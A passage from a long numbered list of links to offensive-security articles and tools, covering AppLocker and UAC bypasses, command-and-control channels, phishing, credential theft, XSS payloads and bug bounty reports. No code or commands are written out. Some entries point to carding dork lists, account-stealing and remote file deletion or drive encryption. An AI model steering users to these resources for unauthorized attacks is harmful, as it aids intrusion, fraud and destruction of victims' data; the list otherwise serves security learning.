whitelist bypass using XLL and embedded shellcode: https://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc -453-AppLocker Bypass – Regsvr32: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32 -454-Nmap Scans using Hex Value of Flags: http://www.hackingarticles.in/nmap-scans-using-hex-value-flags -455-Nmap Scan with Timing Parameters: http://www.hackingarticles.in/nmap-scan-with-timing-parameters -456-OpenSSH User Enumeration Time- Based Attack with Osueta: http://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta -457-Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -458-Penetration Testing on Remote Desktop (Port 3389): http://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389 -459-Penetration Testing on Telnet (Port 23): http://www.hackingarticles.in/penetration-testing-telnet-port-23 -460-Penetration Testing in Windows/Active Directory with Crackmapexec: http://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec -461-Penetration Testing in WordPress Website using WordPress Exploit Framework: http://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework -462-Port Scanning using Metasploit with IPTables: http://www.hackingarticles.in/port-scanning-using-metasploit-iptables -463-Post Exploitation Using WMIC (System Command): http://www.hackingarticles.in/post-exploitation-using-wmic-system-command -464-Privilege Escalation in Linux using etc/passwd file: http://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file -465-RDP Pivoting with Metasploit: http://www.hackingarticles.in/rdp-pivoting-metasploit -466-A New Way to Hack Remote PC using Xerosploit and Metasploit: http://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit -467-Shell to Meterpreter using Session Command: http://www.hackingarticles.in/shell-meterpreter-using-session-command -468-SMTP Pentest Lab Setup in Ubuntu (Port 25): http://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu -469-SNMP Lab Setup and Penetration Testing: http://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing -470-SQL Injection Exploitation in Multiple Targets using Sqlmap: http://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap -471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin): http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin -472-SSH Penetration Testing (Port 22): http://www.hackingarticles.in/ssh-penetration-testing-port-22 -473-Manual Post Exploitation on Windows PC (System Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command -474-SSH Pivoting using Meterpreter: http://www.hackingarticles.in/ssh-pivoting-using-meterpreter -475-Stealing Windows Credentials of Remote PC with MS Office Document: http://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document -476-Telnet Pivoting through Meterpreter: http://www.hackingarticles.in/telnet-pivoting-meterpreter -477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin): http://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin -478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit: http://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit -479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit: http://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit -480-Hack Remote Windows 10 PC using TheFatRat: http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat -481-2 Ways to Hack Windows 10 Password Easy Way: http://www.hackingarticles.in/hack-windows-10-password-easy-way -482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack): http://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack -483-How to Delete ALL Files in Remote Windows PC: http://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2 -484-How to Encrypt Drive of Remote Victim PC: http://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc -485-Post Exploitation in Linux With Metasploit: https://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit -486-Red Team: https://posts.specterops.io/tagged/red-team?source=post -487-Code Signing Certi cate Cloning Attacks and Defenses: https://posts.specterops.io/tagged/code-signing?source=post -488-Phishing: https://posts.specterops.io/tagged/phishing?source=post -489-PowerPick – A ClickOnce Adjunct: http://www.sixdub.net/?p=555 -490-sql-injection-xss-playground: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground -491-Privilege Escalation & Post-Exploitation: https://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md -492-https-payload-and-c2-redirectors: https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41 -493-a-push-toward-transparency: https://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41 -494-bloodhound: https://posts.specterops.io/tagged/bloodhound?source=post -495-active directory: https://posts.specterops.io/tagged/active-directory?source=post -496-Load & Execute Bundles with migrationTool: https://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41 -497-Outlook Forms and Shells: https://sensepost.com/blog/2017/outlook-forms-and-shells/ -498-Tools: https://sensepost.com/blog/tools/ -499-2018 pentesting resources: https://sensepost.com/blog/2018/ -500-network pentest: https://securityonline.info/category/penetration-testing/network-pentest/ -501-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -502-Stored XSS on Facebook: https://opnsec.com/2018/03/stored-xss-on-facebook/ -503-vulnerabilities: https://www.brokenbrowser.com/category/vulnerabilities/ -504-Extending BloodHound: Track and Visualize Your Compromise: https://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise -505-so-you-want-to-be-a-web-security-researcher: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher -506-BugBounty — AWS S3 added to my “Bucket” list!: https://medium.com/p/f68dd7d0d1ce -507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company: https://medium.com/p/c75967392c7e -508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty: https://medium.com/p/159525a9cb62 -509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account: https://medium.com/p/783f71131b94 -510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -511-Ping Power — ICMP Tunnel: https://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41 -512-hacking: https://www.nextleveltricks.com/hacking/ -513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !: https://www.nextleveltricks.com/youtube-channels-to-learn-hacking/ -514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi: https://www.nextleveltricks.com/latest-google-dorks-list/ -515-Art of Shellcoding: Basic AES Shellcode Crypter: http://www.nipunjaswal.com/2018/02/shellcode-crypter.html -516-Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/ -517-nmap-cheatsheet: https://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/ -518-Aws Recon: https://enciphers.com/tag/aws-recon/ -519-Recon: https://enciphers.com/tag/recon/ -520-Subdomain Enumeration: https://enciphers.com/tag/subdomain-enumeration/ -521-Shodan: https://enciphers.com/tag/shodan/ -522-Dump LAPS passwords with ldapsearch: https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/ -523-peepdf - PDF Analysis Tool: http://eternal-todo.com/tools/peepdf-pdf-analysis-tool -524-Evilginx 2 - Next Generation of Phishing 2FA Tokens: breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/ -526-Evil XML with two encodings: https://mohemiv.com/all/evil-xml/ -527-create-word-macros-with-powershell: https://4sysops.com/archives/create-word-macros-with-powershell/ -528-Excess XSS A comprehensive tutorial on cross-site scripting: https://excess-xss.com/ -529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -530-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -532-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -533-“Practical recon techniques for bug hunters & pen testers”: https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41 -534-Exploiting Node.js deserialization bug for Remote Code Execution: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ -535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege: http://www.greyhathacker.net/?p=1006 -536-Running Macros via ActiveX Controls: http://www.greyhathacker.net/?p=948 -537-all=BUG+MALWARE+EXPLOITS http://www.greyhathacker.net/?cat=18 -538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking -539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests: https://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/ -541-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe -542-File Upload XSS: https://medium.com/p/83ea55bb9a55 -543-Firebase Databases: https://medium.com/p/f651a7d49045 -544-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac -545-RED-TEAM: https://cybersyndicates.com/tags/red-team/ -546-Egressing Bluecoat with Cobaltstike & Let's Encrypt: https://www.youtube.com/watch?v=cgwfjCmKQwM -547-Veil-Evasion: https://cybersyndicates.com/tags/veil-evasion/ -548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -549-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -550-Don’t leak sensitive data via security scanning tools: https://medium.com/p/7d1f715f0486 -551-CRLF Injection Into PHP’s cURL Options: https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60 -552-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60 -553-DOM XSS – auth.uber.com: https://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html -554-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -555-exploiting-adobe-coldfusion: https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html -556-Command and Control – HTTPS: https://pentestlab.blog/2017/10/04/command-and-control-https -557-Command and Control – Images: https://pentestlab.blog/2018/01/02/command-and-control-images -558-Command and Control – JavaScript: https://pentestlab.blog/2018/01/08/command-and-control-javascript -559-XSS-Payloads: https://github.com/Pgaijin66/XSS-Payloads -560-Command and Control – Web Interface: https://pentestlab.blog/2018/01/03/command-and-control-web-interface -561-Command and Control – Website: https://pentestlab.blog/2017/11/14/command-and-control-website -562-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -563-atomic-red-team: https://github.com/redcanaryco/atomic-red-team -564-PowerView-3.0-tricks.ps1: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 -565-awesome-sec-talks: https://github.com/PaulSec/awesome-sec-talks -566-Awesome-Red-Teaming: https://github.com/yeyintminthuhtut/Awesome-Red-Teaming -567-awesome-php: https://github.com/ziadoz/awesome-php -568-latest-hacks: https://hackercool.com/latest-hacks/ -569-GraphQL NoSQL Injection Through JSON Types: http://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/ -570-Writing .NET Executables for Pentesters: https://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2 -571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. https://github.com/secfigo/Awesome-Fuzzing -572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC: http://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc -572-Injecting Metasploit Payloads into Android Applications – Manually: https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually -573-Google Dorks For Carding [Huge List] - Part 1: https://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html -574-Google dorks for growth hackers: https://medium.com/p/7f83c8107057 -575-Google Dorks For Carding (HUGE LIST): https://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html -576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks: https://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html -577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc): https://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html -578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html -579-Hijacking VNC (Enum, Brute, Access and Crack): https://medium.com/p/d3d18a4601cc -580-Linux Post Exploitation Command List: https://github.com/mubix/post-exploitation/wiki -581-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -582-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset -583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability: https://www.securityfocus.com/bid/104407 -585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability: https://www.securityfocus.com/bid/104382 -586-miSafes Mi-Cam Device Hijacking: https://packetstormsecurity.com/files/146504/SA-20180221-0.txt -587-Low-Level Windows API Access From PowerShell: https://www.fuzzysecurity.com/tutorials/24.html -588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability: https://www.securityfocus.com/bid/103316 -589-Lateral Movement – RDP: https://pentestlab.blog/2018/04/24/lateral-movement-rdp/ -590-Snagging creds from locked machines: https://malicious.link/post/2016/snagging-creds-from-locked-machines/ -591-Making a Blind SQL Injection a Little Less Blind: https://medium.com/p/428dcb614ba8 -592-VulnHub — Kioptrix: Level 5: https://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60 -593-Unauthenticated Account Takeover Through HTTP Leak: https://medium.com/p/33386bb0ba0b -594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43 -595-Finding Target-relevant Domain Fronts: https://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44 -596-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60 -597-Cobalt Strike Visualizations: https://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60 -598-OWASP Top 10 2017 — Web Application Security Risks: https://medium.com/p/31f356491712 -599-XSS-Auditor — the protector of unprotected: https://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60 -600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine: https://gbhackers.com/netcat-vs-cryptcat -601-Jenkins Servers Infected With Miner.: https://medium.com/p/e370a900ab2e -602-cheat-sheet: http://pentestmonkey.net/category/cheat-sheet -603-Command and Control – Website Keyword: https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ -604-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -605-Command and Control – Windows COM: https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ -606-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ -607-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -608-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -609-Reverse Engineering Android Applications: https://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/ -610-HTML Injection: https://pentestlab.blog/2013/06/26/html-injection/ -611-Meterpreter stage AV/IDS evasion with powershell: https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/ -612-Windows Atomic Tests by ATT&CK Tactic & Technique: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md -613-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware: http://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml -615-How to Bypass Anti-Virus to Run Mimikatz: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/ -616-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -617-USE TOR. USE EMPIRE.: http://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html -617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET: https://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/ -618-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -619-RED TEAM: https://bneg.io/category/red-team/ -620-PDF Tools: https://blog.didierstevens.com/programs/pdf-tools/ -621-DNS Data ex ltration — What is this and How to use? https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822 -621-Google Dorks: https://medium.com/p/7cfd432e0cf3 -622-Hacking with JSP Shells: https://blog.netspi.com/hacking-with-jsp-shells/ -623-Malware Analysis: https://github.com/RPISEC/Malware/raw/master/README.md -624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.: https://github.com/SandySekharan/CTF-tool -625-Group Policy Preferences: https://pentestlab.blog/2017/03/20/group-policy-preferences -627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -628-deobfuscation: https://furoner.wordpress.com/tag/deobfuscation/ -629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS: https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/ -630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING: https://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/ -631-GCAT – BACKDOOR EM PYTHON: https://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/ -632-Latest Carding Dorks List for Sql njection 2019: https://latestechnews.com/carding-dorks/ -633-google docs for credit card: https://latestechnews.com/tag/google-docs-for-credit-card/ -634-How To Scan Multiple Organizations With Shodan and Golang (OSINT): https://medium.com/p/d994ba6a9587 -635-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -636-phishing: https://www.blackhillsinfosec.com/tag/phishing/ -637-Merlin in action: Intro to Merlin: https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I -638-IP Cams from around the world: https://medium.com/p/a6f269f56805 -639-Advanced Cross Site Scripting(XSS) Cheat Sheet by Jaydeep Dabhi: https://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/ -640-Just how easy it is to do a domain or subdomain take over!?: https://medium.com/p/265d635b43d8 -641-How to Create hidden user in Remote PC: http://www.hackingarticles.in/create-hidden-remote-metaspolit -642-Process Doppelgänging – a new way to impersonate a process: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ -643-How to turn a DLL into astandalone EXE: https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/ -644-Hijacking extensions handlers as a malware persistence method: https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/ -645-I'll Get Your Credentials ... Later!: https://www.fuzzysecurity.com/tutorials/18.html -646-Game Over: CanYouPwnMe > Kevgir-1: https://www.fuzzysecurity.com/tutorials/26.html -647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities: http://www.greyhathacker.net/?p=995 -648-Getting started in Bug Bounty: https://medium.com/p/7052da28445a -649-Union SQLi Challenges (Zixem Write-up): https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60 -650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites: https://gbhackers.com/scanless-port-scans-websites-behalf -651-WEBAPP PENTEST: https://securityonline.info/category/penetration-testing/webapp-pentest/ -652-Cross-Site Scripting (XSS) Payloads: https://securityonline.info/tag/cross-site-scripting-xss-payloads/ -653-sg1: swiss army knife for data encryption, exfiltration & covert communication: https://securityonline.info/tag/sg1/ -654-NETWORK PENTEST: https://securityonline.info/category/penetration-testing/network-pentest/ -655-SQL injection in an UPDATE query - a bug bounty story!: https://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html -656-Cross-site Scripting: https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ -657-Local File Inclusion: https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/ -658-Command Injection: https://www.netsparker.com/blog/web-security/command-injection-vulnerability/ -659-a categorized list of Windows CMD commands: https://ss64.com/nt/commands.html -660-Understanding Guide for Nmap Timing Scan (Firewall Bypass): http://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass -661-RFID Hacking with The Proxmark 3: https://blog.kchung.co/tag/rfid/ -662-A practical guide to RFID badge copying: https://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying -663-Denial of Service using Cookie Bombing: https://medium.com/p/55c2d0ef808c -664-Vultr Domain Hijacking: https://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking -665-Command and Control: https://vincentyiu.co.uk/red-team/domain-fronting -666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers: https://gbhackers.com/cisco-global-exploiter-cge -667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -668-Situational Awareness: https://pentestlab.blog/2018/05/28/situational-awareness/ -669-Unquoted Service Path: https://pentestlab.blog/2017/03/09/unquoted-service-path -670-NFS: https://pentestacademy.wordpress.com/2017/09/20/nfs/ -671-List of Tools for Pentest Rookies: https://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/ -672-Common Windows Commands for Pentesters: https://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/ -673-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -674-OSINT x UCCU Workshop on Open Source Intelligence: https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence -675-Advanced Attack Techniques: https://www.cyberark.com/threat-research-category/advanced-attack-techniques/ -676-Credential Theft: https://www.cyberark.com/threat-research-category/credential-theft/ -678-The Cloud Shadow Admin Threat: 10 Permissions to Protect: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ -679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk: https://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/ -680-Weakness Within: Kerberos Delegation: https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/ -681-Simple Domain Fronting PoC with GAE C2 server: https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/ -682-Find Critical Information about a Host using DMitry: https://www.thehackr.com/find-critical-information-host-using-dmitry/ -683-How To Do OS Fingerprinting In Kali Using Xprobe2: http://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA -684-Crack SSH, FTP, Telnet Logins Using Hydra: https://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/ -685-Reveal Saved Passwords in Browser using JavaScript Injection: https://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/ -686-Nmap Cheat Sheet: https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf -687-Manual Post Exploitation on Windows PC (Network Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command -688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool: http://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool -689-Hack Locked Workstation Password in Clear Text: http://www.hackingarticles.in/hack-locked-workstation-password-clear-text -690-How to Find ALL Excel, Office, PDF, and Images in Remote PC: http://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc -691-red-teaming: https://www.redteamsecure.com/category/red-teaming/ -692-Create a Fake AP and Sniff Data mitmAP: http://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/ -693-Bruteforcing From Nmap Output BruteSpray: http://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/ -694-Reverse Engineering Framework radare2: http://www.uaeinfosec.com/reverse-engineering-framework-radare2/ -695-Automated ettercap TCP/IP Hijacking Tool Morpheus: http://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/ -696-List Of Vulnerable SQL Injection Sites: https://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199 -697-Command and Control – Gmail: https://pentestlab.blog/2017/08/03/command-and-control-gmail/ -698-Command and Control – DropBox: https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ -699-Skeleton Key: https://pentestlab.blog/2018/04/10/skeleton-key/ -700-Secondary Logon Handle: https://pentestlab.blog/2017/04/07/secondary-logon-handle -701-Hot Potato: https://pentestlab.blog/2017/04/13/hot-potato -702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -703-Linux-Kernel-exploits: http://tacxingxing.com/category/exploit/kernel-exploit/ -704-Linux-Kernel-Exploit Stack Smashing: http://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/ -705-Linux Kernel Exploit Environment: http://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/ -706-Linux-Kernel-Exploit NULL dereference: http://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/ -707-Apache mod_python for red teams: https://labs.nettitude.com/blog/apache-mod_python-for-red-teams/ -708-Bounty Write-up (HTB): https://medium.com/p/9b01c934dfd2/ 709-CTF Writeups: https://medium.com/ctf-writeups -710-Detecting Malicious Microsoft Office Macro Documents: http://www.greyhathacker.net/?p=872 -711-SQL injection in Drupal: https://hackerone.com/reports/31756 -712-XSS and open redirect on Twitter: https://hackerone.com/reports/260744 -713-Shopify login open redirect: https://hackerone.com/reports/55546 -714-HackerOne interstitial redirect: https://hackerone.com/reports/111968 -715-Ubiquiti sub-domain takeovers: https://hackerone.com/reports/181665 -716-Scan.me pointing to Zendesk: https://hackerone.com/reports/114134 -717-Starbucks' sub-domain takeover: https://hackerone.com/reports/325336 -718-Vine's sub-domain takeover: https://hackerone.com/reports/32825 -719-Uber's sub-domain takeover: https://hackerone.com/reports/175070 -720-Read access to Google: https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ -721-A Facebook XXE with Word: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/ -722-The Wikiloc XXE: https://www.davidsopas.com/wikiloc-xxe-vulnerability/ -723-Uber Jinja2 TTSI: https://hackerone.com/reports/125980 -724-Uber Angular template injection: https://hackerone.com/reports/125027 -725-Yahoo Mail stored XSS: https://klikki.fi/adv/yahoo2.html -726-Google image search XSS: https://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html -727-Shopify Giftcard Cart XSS : https://hackerone.com/reports/95089 -728-Shopify wholesale XSS : https://hackerone.com/reports/106293 -729-Bypassing the Shopify admin authentication: https://hackerone.com/reports/270981 -730-Starbucks race conditions: https://sakurity.com/blog/2015/05/21/starbucks.html -731-Binary.com vulnerability – stealing a user's money: https://hackerone.com/reports/98247 -732-HackerOne signal manipulation: https://hackerone.com/reports/106305 -733-Shopify S buckets open: https://hackerone.com/reports/98819 -734-HackerOne S buckets open: https://hackerone.com/reports/209223 -735-Bypassing the GitLab 2F authentication: https://gitlab.com/gitlab-org/gitlab-ce/issues/14900 -736-Yahoo PHP info disclosure: 